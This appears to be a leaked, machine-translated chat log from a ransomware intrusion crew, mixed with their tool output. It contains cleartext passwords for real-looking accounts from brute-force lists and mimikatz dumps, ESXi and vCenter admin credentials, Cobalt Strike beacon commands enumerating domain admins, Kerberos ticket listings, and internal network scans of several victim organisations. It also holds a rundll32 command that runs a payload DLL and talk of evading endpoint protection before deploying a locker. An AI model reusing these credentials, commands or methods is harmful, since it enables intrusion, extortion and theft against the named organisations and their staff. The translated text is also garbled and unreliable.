``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something
i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried
the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center
ping goes nowhere, domain is not available may well lie useful dokuoksche pay attention to file servers in IT folders let's write back as you check it outcross-check the files, nothing left thereThere are no browsers on all the machines I think the chance is high enough5 people in a working day can find accesses?There's still no found the creeds from the nasovi then give out a couple of vpn, but there without direct accesses. will have to fuck then let's close the sccy then sccy- on belemor have creeps ?snu.edu deadlockedIt turns out that only sccy and snu.No new sessions will be available today? sccy seems to be a couple of sessions alive now checking skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX` ? what to work with today? where are you all already here? it's not like there's a lot of you hello hello
http://172.17.70.13 Banner: nginx
http://172.17.70.13 HQNAS3 - Synology RackStation

http://172.17.70.14 Banner: nginx
http://172.17.70.14 EVO HQ NAS

``````
http://172.17.70.16/certsrv/Default.asp
qlyons
applecherrypenguinski
``````
172.16.1.35:53
172.17.70.7:53
172.17.70.8:53
``cheech.evo.local
172.17.70.16 - ``here somewhere I checked the mail through cme, also no net with the current domain?
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mherna02:Disney Land1',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\odomin:RaspberryPies made in 1911 is not good',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmagent:un4seenconsequences_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\tylerservice:Ty1er$erv1ce7845_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\bross:!World domination2019!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\ldelar:Lnd088034',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\munis:Mun1$5623!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mzuvan:Logitech45W',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\papercutservice:romeo25-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmsvc:0mnicrom-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mandl:ententeich,',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\pgalde:$uper_0lb@P!!!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmadmin:juliet25-',
``most likely it will separate 1 space without a clue`` good question ``juicy cum`` or ``juicy cum`` will consider it as a password ``if there will be an example cum_login will define it as one whole password with a space`` I put it in quotes in the file simply domain is better not to write in a file I ask about that if there is a space in the password there without domain in any case ``you`ll be on LA
USERPASS_FILE no File containing users and passwords separated by space, one pair per line

``and the domain is separately specified in the user:passuser pass module
that's the way it is))
there's just a space there, is it :CLEARTEXT:? just don't remember if it will or won't understand it? through the file most likely cleartexts yes
if you shove them in USERPASS_FILE in smb_login, will it understand quotes in passwords with spaces or will it think that the quotes are part of the password?
```
sisd.net\mherna02:CLEARTEXT:Disney Land1
sisd.net\odomin:CLEARTEXT:RaspberryPies made in 1911 is not good
admin.sisd.k12\sccmagent:CLEARTEXT:un4seenconsequences_
admin.sisd.k12\tylerservice:CLEARTEXT:Ty1er$erv1ce7845_
sisd.net\bross:CLEARTEXT:!World domination2019!
sisd.net\ldelar:CLEARTEXT:Lnd088034
admin.sisd.k12\munis:CLEARTEXT:Mun1$5623!
sisd.net\mzuvan:CLEARTEXT:Logitech45W
admin.sisd.k12\papercutservice:CLEARTEXT:romeo25-
admin.sisd.k12\sccmsvc:CLEARTEXT:0mnicrom-
sisd.net\andl:CLEARTEXT:ententeich,,
sisd.net\pgalde:CLEARTEXT:$uper_0lb@P!
admin.sisd.k12\sccmadmin:CLEARTEXT:juliet25-
``don't polucht only and brutt try the current admins as local there on dki adjacent polzaky not passed if there is no enterpricesucha look for access in the other domain so far datak, here all ready get it?in the name vcertnu then there is probably not. it has what signs? and in the center? a bunch of hypervisors found? then dvcertnu virtualization center or what is it? vcertnu in the center is what? in the center and stuff found?) well, put it out?) yes, also got it)
huh... i'll scrap the ports... work your way up the wpn.
the locker will get through cb - there's more proactive than auto blockingChecked all available armas everywhere cbChecked all servers with cb maybe they'll find a way to break into the network not sit long first thought he was without it, when i pulled the session saw that he was there found a server without cb?
	 * Username : veeam_vss
	 * Domain : EVO
	 * Password : rhR7m1T3ZnhB
	
wdigest :
	 * Username : tcooley
	 * Domain : EVO
	 * Password : SammySeveDog44
	kerberos :
	 * Username : tcooley
	 * Domain : evo.local
	 * Password : SammySeveDog44

	wdigest :
	 * Username : qlyons
	 * Domain : EVO
	 * Password : applecherrypenguinski

```
wait for builduser7 then we will close todaya, there is still a daughter YES in google with 2phmail in the softcloud the rest of the passes do not fit, the mail in general has access to the general manager, some operator and an empty mail is given to the mail is there info? well not a dump, maybe important files, planes build all the same judging by the name, perhaps there filewash look
We found everything but the access to one nasa.
there are two disks, one (Mechanic_Library) is not accessible
this one is nowhere to be seen in the files / browsers
coba in lsnado will be a new coba
today no pulls ok, a couple of hortbits and die
SI-SCIP01: 10.0.2.120
SKY-SQL: 10.0.2.129
SKY-BEUZA-01: 10.0.2.20
SKY-DC02: 10.0.2.11
SKY-CRM: 10.0.2.10
DMW-PRINT-PC: 10.0.6.75
SKY-BEDMW-01: 10.0.6.13
SKY-DC04: 10.0.6.27
MTN-PLAYER-PC: 10.0.1.180
``````
MTN-PLAYER-PC
SKY-MGT
SKY-BAL
SKY-TS01
SKY-TS01
SKYDC-RH
SKY-DCPS
UZA-DERRICKW-PC
UZA-DERRICKW-PC
DMW-MANDYF-SURF
DMW-FRONTDESK2
DMW-CHUCKM1-PC
DMW-CHUCKM1-PC
``hdavail.comhello everybody hello everybodyuser4user8 This one we don't have access to, the others do
```
Shared resources at \10.0.6.83

LS520Dc5f server

Share name Type Used as Comment

-------------------------------------------------------------------------------
Mechanic_Library Disk Mechanic Library
Public Disk
The command completed successfully.

On these servers, you have to check the vim console to see if there is a link to the cloud
```
SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS
sky-beuza-01.skytech1.local
``````
https://10.0.2.32/ui/#/login ESXi' root\$uperm@n
``````
Website: https://sky-vcenter65.skytech1.local
Username: 'administrator@vsphere.local'
Password: 'Superm@n2018'
``````
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas

``If I understood correctly some kind of admin from what ``
http://10.0.6.243/web/guest/en/websys/webArch/mainFrame.cgi
``````
https://10.0.6.98/login.html PowerEdge T620

http://10.0.6.153/ myshara
http://10.0.6.83/rtknas4.40/ nas
http://10.0.6.54 is requesting your username and password. The site says: "ReadyNAS Admin".
``````
https://10.0.2.32/ui/#/login ESXi'
https://10.0.2.34/ui/#/login
https://10.0.2.36/ui/#/login
https://10.0.2.38/ui/#/login
https://10.0.6.24/ui/
``````
10.0.6.243:80
10.0.6.155:80
10.0.6.153:443
10.0.6.153:80
10.0.6.130:8080
10.0.6.130:443
10.0.6.130:80
10.0.6.124:8080
10.0.6.124:80
10.0.6.117:8080
10.0.6.117:443
10.0.6.117:80
10.0.6.98:443
10.0.6.98:80
10.0.6.96:8080
10.0.6.96:443
10.0.6.96:80
10.0.6.95:443
10.0.6.95:80
10.0.6.86:8080
10.0.6.86:443
10.0.6.86:80
10.0.6.83:443
10.0.6.83:80
10.0.6.73:8080
10.0.6.73:443
10.0.6.73:80
10.0.6.62:443
10.0.6.62:80
10.0.6.58:8080
10.0.6.58:443
10.0.6.58:80
10.0.6.54:443
10.0.6.54:80
10.0.6.109:22 (SSH-2.0-dropbear)
10.0.6.98:22 (SSH-2.0-OpenSSH_7.4)
10.0.6.79:22 (SSH-2.0-dropbear)
10.0.6.155:8080
10.0.6.155:443
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) nas
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas



10.0.2.39:443
10.0.2.39:80
10.0.2.38:443
10.0.2.38:80
10.0.2.36:443
10.0.2.36:80
10.0.2.35:443
10.0.2.35:80
10.0.2.34:443
10.0.2.34:80
10.0.2.32:443
10.0.2.32:80
10.0.2.31:443
10.0.2.31:80
10.0.2.28:443
10.0.2.28:80
10.0.2.25:443
10.0.2.25:80
10.0.2.21:80
10.0.2.20:80
10.0.2.17:80
10.0.2.15:443
10.0.2.15:80
10.0.2.11:443
10.0.2.11:80
10.0.2.10:443
10.0.2.10:80
10.0.2.8:80
10.0.2.7:80
10.0.2.1:80
10.0.1.179:80
10.0.1.101:80
10.0.2.39:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.38:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.36:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.35:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.34:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.32:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.31:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.17:22 (SSH-2.0-OpenSSH_5.9p1-hpn13v11)
10.0.2.15:22 (SSH-2.0-OpenSSH_7.1)
10.0.2.5:22 (SSH-2.0-dropbear)
10.0.2.4:22 (SSH-2.0-dropbear)
10.0.2.2:22 (SSH-2.0-dropbear)
10.0.1.181:22 (SSH-2.0-dropbear)
10.0.2.3:22 (SSH-2.0-dropbear)

``I got it, can you help dumbo come back before 1 o'clock@tl1 help others? the machine seems to be off
all the sessions are off,the last 10-15 minutes of doing nothing with the session is ok,keep working i ran it without and it worked i'm not sure i need it,no it didn't delete? what do i wait for?
how do you know it worked? shell rundll32 C:\Users\color764\AppData\Local\Packages\AD2F1837.HPPrinterControl_v10z8vjag6ke6\LocalState\HPPrinterControl_v10.dll, ehnpruPontv #generald how to run and what does it do?

```

beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ORANGE_FACT\Desk_Top_Admin
ORANGE_FACT\Domain Admins
ORANGE_FACT\POSAdmin
The command completed successfully.



beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator avamarbackupuser hpsim
itinfo jf jimfu
jmb jonb kendallr
kr MDJ meraki1
mikedj MSOL_c4e9c8b90962 prtg
prtgnew rd scotttaylor
siem_agent SQLADMIN SQLSYSTEM
Svc_ADSync zscaler
The command completed successfully.




beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator jb jf
jmb kr MDJ
mikedj rd scotttaylor
Svc_ADSync
The command completed successfully.



``````
[*] 192.168.168.5:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.168.5:445 - Host could not be identified: Unix (Samba 3.0.33-3.41.el5_11)
[*] 192.168.168.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (uptime:21w 0d 1h 37m 25s) (guid:{ff73b7ae-f1ba-46e5-8e8b-3c9fb9444156}) (authentication domain:PKGPROD)
[+] 192.168.168.15:445 - Host is running Windows 2012 Standard (build:9200) (name:TIMECLOCKSQL) (domain:PKGPROD)
[*] 192.168.168.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:required) (uptime:6d 8h 40m 17s) (guid:{c40e3c81-0bce-4afc-ba0d-e18c58581a0c}) (authentication domain:PKGPROD)
[+] 192.168.168.10:445 - Host is running Windows 2012 Standard (build:9200) (name:2K12SERVER) (domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 23 of 80 hosts (28% complete)
[*] 192.168.168.1-80:     - Scanned 31 of 80 hosts (38% complete)
[*] 192.168.168.1-80:     - Scanned 45 of 80 hosts (56% complete)
[*] 192.168.168.1-80:     - Scanned 46 of 80 hosts (57% complete)
[*] 192.168.168.1-80:     - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.1-80:     - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.54:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 27m 49s) (guid:{56e90780-c2ba-45ef-877d-d2f418746196}) (authentication domain:PKGPROD)
[+] 192.168.168.54:445 - Host is running Windows 8.1 Pro (build:9600) (name:FRONTDESK) (domain:PKGPROD)
[*] 192.168.168.53:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{d0b01a41-07d7-4ad5-a0b6-90c069a5bd26}) (authentication domain:PKGPROD)
[*] 192.168.168.70:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:3d 8h 25m 12s) (guid:{cb8fffad-f637-4c85-b211-e32b405df3ac}) (authentication domain:PKGPROD)
[+] 192.168.168.70:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-101) (domain:PKGPROD)
[*] 192.168.168.63:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 28m 22s) (guid:{ac014121-b0c2-442a-93b8-d2c98f8c66e2}) (authentication domain:PKGPROD)
[+] 192.168.168.63:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-102) (domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 56 of 80 hosts (70% complete)
[*] 192.168.168.73:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce91e8ea-649b-4aa0-b6e3-81718f694399}) (authentication domain:PKGPROD)
[*] 192.168.168.66:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{62b17fea-9ad5-4532-92cf-8276e5e90b86}) (authentication domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 71 of 80 hosts (88% complete)
[*] 192.168.168.1-80:     - Scanned 80 of 80 hosts (100% complete)
[*] Auxiliary module execution completed

``https://kali.tools/?p=5342что for thin clients?'' script runs `` ACUCOBOL-GT Web Thin Client ````
' Location of file with usernames and human-readable terminal numbers
SouthWareUsersFile = "swusers\swusers.txt"
``what's up?
beacon> mimikatz kerberos::list
[*] Tasked beacon to run mimikatz's kerberos::list command
[+] host called home, sent: 706120 bytes
[+] received output:

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 8:27:44 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/18/2020 4:48:38 AM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : RPCSS/2K12SERVER.pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : ldap/2k12server.pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : cifs/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000005] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:32 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : LDAP/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
``````
(ARP) Target '192.168.168.10' is alive. (ARP) Target '192.168.168.15' is alive. 00-15-5D-A8-0A-039C
(ARP) Target '192.168.168.5' is alive. -(ARP) Target '192.168.168.1' is alive. 008E2C---1599B8---5D5BED---A88823---0A6A3A-
-0100


[+] received output:
(ARP) Target '192.168.168.54' is alive. (ARP) Target '192.168.168.53' is alive. 64F4--5139--0609--551A--08EA--50A7

(ARP) Target '192.168.168.63' is alive. A0-48-1C-99-8D-D8
(ARP) Target '192.168.168.50' is alive. 98-8B-0A-C2-59-08
(ARP) Target '192.168.168.66' is alive. (ARP) Target '192.168.168.70' is alive. F4A0--3948--091C--0F99--9B8E--A8AD

(ARP) Target '192.168.168.73' is alive. 9C-7B-EF-AD-76-64

[+] received output:
(ARP) Target '192.168.168.88' is alive. 00-11-0A-F7-EA-A8

[+] received output:
(ARP) Target '192.168.168.231' is alive. 00-AF-1F-6F-A2-E1

[+] received output:
192.168.168.73:3389

[+] received output:
192.168.168.73:139
192.168.168.73:135

[+] received output:
192.168.168.70:3389

[+] received output:
192.168.168.70:664

[+] received output:
192.168.168.70:623

[+] received output:
192.168.168.70:139
192.168.168.70:135

[+] received output:
192.168.168.66:3389

[+] received output:
192.168.168.66:139
192.168.168.66:135

[+] received output:
192.168.168.63:3389

[+] received output:
192.168.168.63:664

[+] received output:
192.168.168.63:623

[+] received output:
192.168.168.63:139
192.168.168.63:135

[+] received output:
192.168.168.54:664

[+] received output:
192.168.168.54:139
192.168.168.54:135

[+] received output:
192.168.168.53:3389

[+] received output:
192.168.168.53:139
192.168.168.53:135

[+] received output:
192.168.168.50:554

[+] received output:
192.168.168.50:80

[+] received output:
192.168.168.15:5985
192.168.168.15:5949
192.168.168.15:5948

[+] received output:
192.168.168.15:5504

[+] received output:
192.168.168.15:3389

[+] received output:
192.168.168.15:443

[+] received output:
192.168.168.15:139
192.168.168.15:135
192.168.168.15:80
192.168.168.10:5985
192.168.168.10:5949
192.168.168.10:5948

[+] received output:
192.168.168.10:3389

[+] received output:
192.168.168.10:636

[+] received output:
192.168.168.10:593

[+] received output:
192.168.168.10:464

[+] received output:
192.168.168.10:389
192.168.168.10:139
192.168.168.10:135

[+] received output:
192.168.168.10:88
192.168.168.10:53
192.168.168.5:5632

[+] received output:
192.168.168.5:631
192.168.168.5:609

[+] received output:
192.168.168.5:139
192.168.168.5:111
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)

[+] received output:
192.168.168.1:443

[+] received output:
192.168.168.1:80
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
192.168.168.5:445 (platform: 500 version: 4.9 name: PKGPROD domain: MYGROUP)
192.168.168.10:445 (platform: 500 version: 6.2 name: 2K12SERVER domain: PKGPROD)
192.168.168.15:445 (platform: 500 version: 6.2 name: TIMECLOCKSQL domain: PKGPROD)
192.168.168.53:445 (platform: 500 version: 10.0 name: SALES2-HP-2019 domain: PKGPROD)
192.168.168.54:445 (platform: 500 version: 6.3 name: FRONTDESK domain: PKGPROD)
192.168.168.63:445 (platform: 500 version: 6.3 name: PKG-102 domain: PKGPROD)
192.168.168.66:445 (platform: 500 version: 10.0 name: BARBARA-HP-2019 domain: PKGPROD)
192.168.168.70:445 (platform: 500 version: 6.3 name: PKG-101 domain: PKGPROD)
192.168.168.73:445 (platform: 500 version: 10.0 name: SALES1-HP-2019 domain: PKGPROD)
Scanner module is complete
``````
Windows IP Configuration

   Host Name . . . . . Sales1-HP-2019
   Primary Dns Suffix . . . . ♪ pkgprod.local ♪
   Node Type ... ... . .: Hybrid
   IP Routing Enabled . . . . : No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. : pkgprod.local

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . . : pkgprod.local
   Description . . . . . : Realtek PCIe GbE Family Controller
   Physical Address . . . . .: 9C-7B-EF-AD-76-64
   DHCP Enabled. . . . . .: Yes
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address. : fe80::994:371f:ea5d:17bb%7(Preferred)
   IPv4 Address . . . . : 192.168.168.73(Preferred)
   Subnet Mask . . . . : 255.255.255.0
   Lease Obtained... on... ♪ Monday, September 14, 2020 6:18:32 PM ♪
   Lease Expires . . . . .: Tuesday, September 22, 2020 6:18:28 PM
   Default Gateway . . . . : 192.168.168.1
   DHCP Server . . . . : 192.168.168.10
   DHCPv6 IAID . . . . : 110918639
   DHCPv6 Client DUID . . . . : 00-01-00-01-24-C4-86-07-9C-7B-EF-AD-76-64
   DNS Servers . . . . : 192.168.168.10
   Primary WINS Server . . . . : 192.168.168.10
   NetBIOS over Tcpip-- : Enabled

``Not sure there's going to be a session again kidalidll kinli?[ ](https://mediaeveryone.com/group/sccy-com?msg=ZRJ3v6qNBEGCHKYis) here```
10.1.4.250:80 --alibi
 
10.1.4.211:443 -- it did not open
10.1.4.211:80
 
10.1.4.151:80 -- did not open
 
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 -- 503 Service Not Available
 
10.0.0.210:80 -- Web Service tab, did not open
``````
10.0.0.5:445 (platform: 500 version: 10.0 name: SCCY-DC domain: SCCY)
10.0.0.17:445 (platform: 500 version: 10.0 name: SCCY-14 domain: SCCY)
10.0.0.24:445 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
10.0.0.26:445 (platform: 500 version: 10.0 name: SCCY-LT07 domain: SCCY)
10.0.0.38:445
10.0.0.40:445 (platform: 500 version: 10.0 name: SCCY-04 domain: SCCY)
10.0.0.41:445 (platform: 500 version: 10.0 name: SCCY-10 domain: SCCY)
10.0.0.45:445
10.0.0.51:445 (platform: 500 version: 6.1 name: SCCY-DATTO domain: WORKGROUP)
10.0.0.57:445 (platform: 500 version: 10.0 name: SCCY-03 domain: SCCY)
10.0.0.59:445 (platform: 500 version: 10.0 name: SCCY-05 domain: SCCY)
10.0.0.62:445 (platform: 500 version: 10.0 name: SCCY-19 domain: SCCY)
10.0.0.63:445
10.0.0.67:445 (platform: 500 version: 10.0 name: SCCY-LT04 domain: SCCY)
10.0.0.71:445 (platform: 500 version: 10.0 name: SCCY-LT05 domain: SCCY)
10.0.0.75:445 (platform: 500 version: 10.0 name: SCCY-LT3 domain: SCCY)
10.0.0.76:445 (platform: 500 version: 10.0 name: SCCY-01 domain: SCCY)
10.0.0.82:445 (platform: 500 version: 10.0 name: CONNIE-MICRO domain: SCCY)
10.0.0.83:445
10.0.0.84:445 (platform: 500 version: 10.0 name: SCCY-02 domain: SCCY)
10.0.0.89:445 (platform: 500 version: 10.0 name: JOE-AIO2 domain: SCCY)
10.0.0.91:445 (platform: 500 version: 10.0 name: SCCY-RECEIVING domain: SCCY)
10.0.0.93:445 (platform: 500 version: 6.1 name: QVPRO-PC domain: SCCY)
10.0.0.102:445 (platform: 500 version: 10.0 name: SCCY-16 domain: SCCY)
10.0.0.103:445 (platform: 500 version: 10.0 name: JOE-BOXX-W10 domain: SCCY)
10.0.0.110:445 (platform: 500 version: 10.0 name: MFGWIN10-1 domain: SCCY)
10.0.0.111:445 (platform: 500 version: 10.0 name: SCCY-12 domain: SCCY)
10.0.0.113:445 (platform: 500 version: 10.0 name: QATRACKING domain: SCCY)
10.0.0.116:445 (platform: 500 version: 10.0 name: SCCY-18 domain: SCCY)
10.0.0.118:445 (platform: 500 version: 10.0 name: SCCY-15 domain: SCCY)
10.0.0.119:445 (platform: 500 version: 10.0 name: SCCY-09 domain: SCCY)
10.0.0.123:445 (platform: 500 version: 10.0 name: SCCY-11 domain: SCCY)
10.0.0.128:445 (platform: 500 version: 10.0 name: SCCY-08 domain: SCCY)
10.0.0.146:445 (platform: 500 version: 10.0 name: SCCY-06 domain: SCCY)
10.0.0.147:445 (platform: 500 version: 10.0 name: SCCY-21 domain: SCCY)
10.0.0.148:445 (platform: 500 version: 10.0 name: SCCY-13 domain: SCCY)
10.0.0.252:445 (platform: 500 version: 10.0 name: TS domain: SCCY)
10.0.30.117:445
10.0.30.118:445
10.0.30.123:445
10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY)
10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
Scanner module is complete
``````
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 --br

10.0.0.122:443
10.0.0.122:80

10.0.0.132:22 (SSH-2.0-OpenSSH_7.8) --- BR
10.0.0.132:443
10.0.0.132:80

10.0.0.134:22 (SSH-2.0-OpenSSH_7.8) ---BR
10.0.0.134:443
10.0.0.134:80

10.0.0.151:22 (SSH-2.0-OpenSSH_6.6) --BR
10.0.0.151:443
10.0.0.151:80

10.0.0.152:80

10.0.0.153:80

10.0.0.15:443

10.0.0.154:80

10.0.0.16:443 PRINTER
10.0.0.16:80

10.0.0.199:443 BROWSER!!!!!    VPN
10.0.0.199:80

10.0.0.200:443 BROWSER!!! CANON
10.0.0.200:80

10.0.0.201:443 BROWSER!!!    CANON
10.0.0.201:80

10.0.0.202:80 HZ BROWSER!!!     ALIBI AV?

10.0.0.203:443 CANON
10.0.0.203:80

10.0.0.204:443 CANON
10.0.0.204:80

10.0.0.205:443 CANON
10.0.0.205:80

10.0.0.206:443 CANON
10.0.0.206:80

10.0.0.210:80 ?????

10.0.0.215:80 ZEBRA

10.0.0.21:80 NETGEAR router

10.0.0.230:22 (SSH-2.0-mpSSH_0.2.1) HP iLO SQLSRVR VHOST
10.0.0.230:80

10.0.0.235:80

10.0.0.236:80

10.0.0.237:80

10.0.0.24:80 IIS

10.0.0.252:443 RD Web Access
10.0.0.252:80

10.0.0.29:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.29:443
10.0.0.29:80

10.0.0.30:22 (SSH-2.0-dropbear_2013.59)

10.0.0.34:443
10.0.0.34:80

10.0.0.39:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.42:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.43:80 ALLWORKS

10.0.0.4:443 NAS Synology !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
10.0.0.4:80

10.0.0.46:22 (SSH-2.0-dropbear_2018.76) HZ ????
10.0.0.46:443
10.0.0.46:80



10.0.0.49:22 (SSH-2.0-OpenSSH_6.1)

10.0.0.50:443 CANON
10.0.0.50:80

10.0.0.51:443 NAS ?!?!?
10.0.0.51:80

10.0.0.52:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.0.52:443
10.0.0.52:80

10.0.0.55:443
10.0.0.55:80

10.0.0.67:80

10.0.0.6:80

10.0.0.90:443
10.0.0.90:80

10.0.0.99:80

10.0.30.100:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.100:443
10.0.30.100:80

10.0.30.101:22 (SSH-2.0-dropbear_2018.76) HZ ?????
10.0.30.101:443
10.0.30.101:80

10.0.30.119:443
10.0.30.119:80

10.0.30.126:80

10.0.30.127:22 (SSH-2.0-dropbear_2018.76) HZ ???
10.0.30.127:443
10.0.30.127:80

10.0.30.128:80

10.0.30.129:80

10.0.30.130:80

10.0.30.131:80

10.0.30.132:80

10.0.30.133:80

10.0.30.30:22 (SSH-2.0-OpenSSH_6.1)

10.0.30.4:443 SWITCH
10.0.30.4:80

10.0.30.5:443
10.0.30.5:80

 10.0.40.2:443
10.0.40.2:80

``````

10.1.4.250:80 -br

10.1.4.211:443 -br
10.1.4.211:80

10.1.4.175:443 -NAS
10.1.4.175:80
10.1.4.175:22 (SSH-2.0-OpenSSH_7.4)
10.1.4.175:445

10.1.4.162:80 - phone?

10.1.4.153:80 -phone

10.1.4.152:80 -phone
